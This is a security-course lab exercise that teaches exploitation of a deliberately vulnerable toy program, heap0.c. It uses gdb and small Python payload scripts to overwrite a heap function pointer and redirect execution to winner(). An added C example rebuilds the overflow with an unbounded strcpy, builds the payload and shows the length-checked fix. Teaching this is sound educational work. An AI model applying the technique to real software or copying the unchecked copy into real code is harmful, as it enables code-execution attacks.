ED 205: Very Simple Heap Overflow (10 pts)

What You Need

A 32-bit x86 Kali Linux machine, real or virtual. The project was written on Kali 2.

Purpose

To practice exploiting a very simple heap overflow vulnerability. This one is easy to exploit because the heap holds a function pointer that the program later calls through, and that pointer sits right after an overflowable buffer. Overwriting it makes the heap overflow as simple as a stack overflow targeting EIP: no allocator metadata has to be corrupted, only a pointer the program is going to use.

Creating a Vulnerable Program

This program just echoes back text from its command-line argument.

In Kali, in a Terminal window, execute these commands:

curl https://samsclass.info/127/proj/heap0.c > heap0.c
gcc heap0.c -w -g -no-pie -z execstack -o heap0
./heap0 HELLO
./heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
As shown below, running the program with "HELLO" works, showing a "level has not been passed" message, but running it with 90 'A' characters causes a "Segmentation fault".

Two of the gcc flags matter for the rest of the project: -no-pie gives the binary a fixed load address, so an address found in gdb is the same when the program runs outside gdb, and -g keeps the symbols the debugger needs (-w just suppresses warnings). -z execstack is not needed for this exploit, which never runs injected code; it only redirects a function call.

Examining the Source Code

In Kali, in a Terminal window, execute these commands:
 nano heap0.c 
As shown below, two structs are defined. Both are allocated at run time, one after the other, in a portion of memory called the "heap".

The first struct holds name[64], a buffer with room for 64 bytes. The program copies the command-line argument into it with no length check, so a longer argument keeps writing past the end of the buffer.

Then comes fp, which holds a 4-byte pointer--that is, a RAM address. Because this second object is allocated right after the first, the bytes that overflow name[64] land on it.

Finally, there's a function named winner(). As you might expect, our goal is to execute that function.

Scroll down to see the rest of heap0.c, as shown below.

Close the file with Ctrl+X.

Observing the Heap

Execute these commands to run the program in the gdb debugger, place a breakpoint, run it with a short input string, and examine the process memory map:
gdb ./heap0
list 25,40
b 38
run AAAA
info proc map
Find the heap. When I did it, the heap was the fourth item on the list, starting at 0x804b000, as shown below. (gdb disables ASLR, so outside the debugger the heap address will differ from run to run; the final exploit depends only on the fixed address of winner(), never on a heap address.)

Execute this instruction to see the contents of the heap, replacing the address with the correct address of the heap on your system.

 x/120x 0x804b000 
Find "0x41414141" on the heap, as shown below. You may have to press Enter to see more pages of memory to find it on your system.

As highlighted below, two values are stored on the heap: "0x41414141" is 'AAAA', and a short distance after that there's an address, which was 0x080484c1 when I did it.

Execute this instruction to disassemble the function "nowinner".

 disassemble nowinner 
As shown below, this function starts at the address stored on the heap: 0x080484c1 on my system. That stored address is the function pointer fp, which the program calls after copying the input. The bytes between the 'AAAA' and it are the rest of name[64] plus the allocator's bookkeeping for the second object, which is why the distance is more than 64 bytes.

Execute these instructions to exit the debugger.

q
y

Observing a Crash

In Kali, in a Terminal window, execute this command:
 nano h1 
Enter this code, as shown below:
 #!/usr/bin/python
 print('A' * 90)

Save the file with Ctrl+X, Y, Enter.

Execute these commands to make the file executable, test it, and send it to heap0:

 chmod a+x h1
 ./h1
 ./heap0 $(./h1)

90 characters are enough to crash the program.

Controlling the EIP

Execute these commands to make a modified attack file, to find out what characters ended up in $eip.
 cp h1 h2
 nano h2
Modify the file to send only 70 'A' characters followed by 20 bytes in a nonrepeating pattern, as shown below. The two-digit numbers '00' through '09' run together make a 20-character pattern in which any four consecutive bytes identify their own offset.

Save the file with Ctrl+X, Y, Enter.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.
 gdb -q ./heap0
 run $(./h2)
 info registers
 q
 y
As shown below, the program crashes with $eip = 0x36303530, or the ASCII text '0506'. x86 is little-endian, so the bytes '0', '5', '0', '6' in memory are displayed as a register value with the last byte first.

On my system, the characters before the EIP were 70 "A"s + '0001020304' for a total of 80 characters. That 80-byte distance from the start of name[64] to the function pointer is the number the rest of the exploit is built on.

Targeting the EIP

Execute these commands to make a modified attack program that attempts to put 'BCDE' into the EIP.
 cp h2 h3
 nano h3
Modify the file as shown below, so that it prints 80 'A' characters followed by 'BCDE'.

Save the file with Ctrl+X, Y, Enter.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.
 gdb -q ./heap0
 run $(./h3)
 info registers
As shown below, the program crashes with $eip = 0x45444342, or the ASCII text 'BCDE'. The four bytes after the 80-byte padding go straight into the function pointer, so whatever address is placed there is where the program will jump.

Finding an Address to Inject

Execute these commands to disassemble the winner() function.
 disassemble winner
 q
 y
As shown below, the function started at address 0x08048496 on my system. Your address may be different--use the address you see on your screen. Because the binary was built with -no-pie, this address is the same between runs and between gdb and the shell.

The Final Exploit File

Execute these commands to make another attack program that puts 0x08048496 into the EIP.
 cp h3 h4
 nano h4
Modify the file as shown below, replacing 'BCDE' with the four bytes of the winner() address in little-endian order (least significant byte first): 0x96, 0x84, 0x04, 0x08. This address contains no zero byte, which matters because the copy into name[64] stops at the first NUL.

Save the file with Ctrl+X, Y, Enter.
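The following C program is an added example, not code from the page or from heap0.c, that ties the two halves of the project together: the two-struct layout from "Examining the Source Code" and the payload that h4 sends. It reconstructs the layout (the struct names, the winner_ran flag and the helper names are this example's own), measures on the live heap the distance from name[] to the function pointer that the h2 experiment found to be 80 bytes, builds the padding-plus-little-endian-address payload, performs the overflow in-process against its own winner(), and shows the bounded copy that removes the bug. The distance it prints depends on the glibc version and pointer width, and the in-process hijack assumes a build like heap0's, without -O2/_FORTIFY_SOURCE or AddressSanitizer, which would stop the overflow.

```c
/* Added example: a reconstruction of the heap0 layout, not the page's heap0.c.
 * Struct names, helper names and the winner_ran flag are this example's own.
 * Build like heap0 (no -O2, no _FORTIFY_SOURCE, no ASan):
 *   gcc -w -g -no-pie heap_demo.c -o heap_demo   (file name is an assumption) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

struct data { char name[64]; };      /* allocated first: the overflowable buffer */
struct fp   { void (*fp)(void); };   /* allocated second: the pointer that gets overwritten */

static int winner_ran;               /* set when the hijacked call lands in winner() */

void winner(void)   { winner_ran = 1; puts("level passed"); }
void nowinner(void) { puts("level has not been passed"); }

/* Distance in bytes from the start of d->name to f->fp when the two objects are
 * malloc'd back to back. It is more than 64 because the allocator's chunk header
 * for the second object sits in between: 80 on the page's Kali 2018 target (and
 * on 64-bit glibc), 72 on older 32-bit glibc with 8-byte alignment. Measure it
 * rather than assume it. */
size_t heap_gap(void)
{
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    size_t gap = (size_t)((uintptr_t)&f->fp - (uintptr_t)d->name);
    free(f);
    free(d);
    return gap;
}

/* gap bytes of padding, then the target address least-significant byte first
 * (the '0506' -> 0x36303530 and 'BCDE' -> 0x45444342 observations on the page
 * show this little-endian order), NUL-terminated so it survives strcpy().
 * Returns the payload length without the NUL. */
size_t build_payload(unsigned char *out, size_t gap, uintptr_t target)
{
    memset(out, 'A', gap);
    for (size_t i = 0; i < sizeof target; i++)
        out[gap + i] = (unsigned char)(target >> (8 * i));
    out[gap + sizeof target] = '\0';
    return gap + sizeof target;
}

/* The bug as on the page: an unbounded strcpy() from attacker input into
 * name[64], then a call through the pointer that sits gap bytes later.
 * A zero byte inside the target address would end the copy early, which is
 * why 0x08048496 (no zero byte) is a convenient target. Returns 1 if the call
 * landed in winner(). */
int hijack(const char *input)
{
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    f->fp = nowinner;
    winner_ran = 0;
    strcpy(d->name, input);          /* overflow: writes past name[64] into *f */
    f->fp();                         /* now calls whatever address the input supplied */
    return winner_ran;               /* d and f are leaked on purpose: f's chunk header is corrupt */
}

/* The fix: check the length against the buffer and refuse input that does not
 * fit, instead of copying blindly. Returns 0 on success, -1 if rejected. */
int set_name_checked(struct data *d, const char *src)
{
    size_t n = strlen(src);
    if (n >= sizeof d->name)
        return -1;
    memcpy(d->name, src, n + 1);     /* n + 1 copies the terminating NUL too */
    return 0;
}

int main(void)
{
    unsigned char payload[256];
    struct data local;
    size_t gap = heap_gap();

    printf("name[] to fp distance on this heap: %zu bytes\n", gap);
    build_payload(payload, gap, (uintptr_t)winner);
    printf("hijacked call reached winner(): %d\n", hijack((const char *)payload));
    printf("checked copy of the %zu-byte payload: %d (rejected)\n",
           strlen((const char *)payload),
           set_name_checked(&local, (const char *)payload));
    printf("checked copy of \"HELLO\": %d (accepted)\n",
           set_name_checked(&local, "HELLO"));
    return 0;
}
```

Run it and compare the printed distance with the 80 the h2 experiment found; h4 is exactly build_payload() with that distance and 0x08048496, written out by a script instead of at run time. The checked copy is the whole fix: once the length of the input is compared with sizeof name before copying, the function pointer after the buffer can no longer be reached.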


ED 205.1 Heap Exploit (10 pts)

Testing the Exploit

Execute this command:
 ./heap0 $(./h4) 
The flag appears, covered by a green box in the image below.

Sources

https://www.vulnhub.com/series/exploit-exercises,11/#

https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf

https://www.mattandreko.com/2012/01/10/exploit-exercises-heap-0/


Posted 9-17-15 by Sam Bowne
Revised 9-28-15
Revised for Kali 2018.1 2-22-18
Tested on Kali 2018.3 x86 and it worked fine 9-22-18